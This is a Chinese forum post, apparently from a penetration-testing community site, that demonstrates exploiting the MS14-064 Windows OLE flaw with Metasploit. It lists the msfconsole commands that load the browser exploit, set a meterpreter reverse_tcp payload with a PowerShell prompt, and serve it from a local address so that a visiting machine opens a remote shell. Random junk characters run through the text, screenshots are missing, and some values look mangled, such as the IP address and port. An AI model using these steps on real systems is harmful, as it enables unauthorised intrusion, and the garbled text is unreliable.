我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ M8 s, P: J! T: V9 `8 k
# n9 B& \, n3 |9 b* c3 a5 O) E" C& {$ z5 t/ p
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
$ Q! [. C/ J, [) |" ?( i: q# w 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
. K' C% Y4 \6 v2 |& rset AllowPowershellPrompt true f' k7 g6 B: f$ q4 v5 C0 U
Set LHOST 192.168.0.1099 Z2 N; S' R0 d8 l( @! p
5 p% D, v6 Y: F6 w1 v+ A1 N- Fu! G5 L7 d: _8 v9 C: u# Z: u7 N set SRVHOST 192.168.0.109
Set uripath share
( D% I W. e0 @6 A% FSet srvport 809 t5 F. W$ Q0 ~
- G; U0 }9 a O b7 O3 ?8 B& Y$ l7 J
% K0 y# z* g# G/ q
7 A7 Y+ k F T" |6 e
7 A7 n) E- J' o( y. f: A
( P2 V/ t& W X# L % q3 @/ A- y; `
, [, `- G7 R \3 D& z& \
7 @ ^9 J+ X5 q: n5 i9 w7 J3 S' k" h! e- T; z( ? 下面我们来访问本地地址如图:/ d( z: I% \; E- E% b
, D7 d9 V7 F( P9 S9 q! z6 e7 }6 x3 T! r# f ' T4 E4 w6 W9 m i# y
; T6 _. r9 u3 |" G
3 u! f: S! R6 a0 e8 [5 ^6 a0 X9 a! _7 x
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |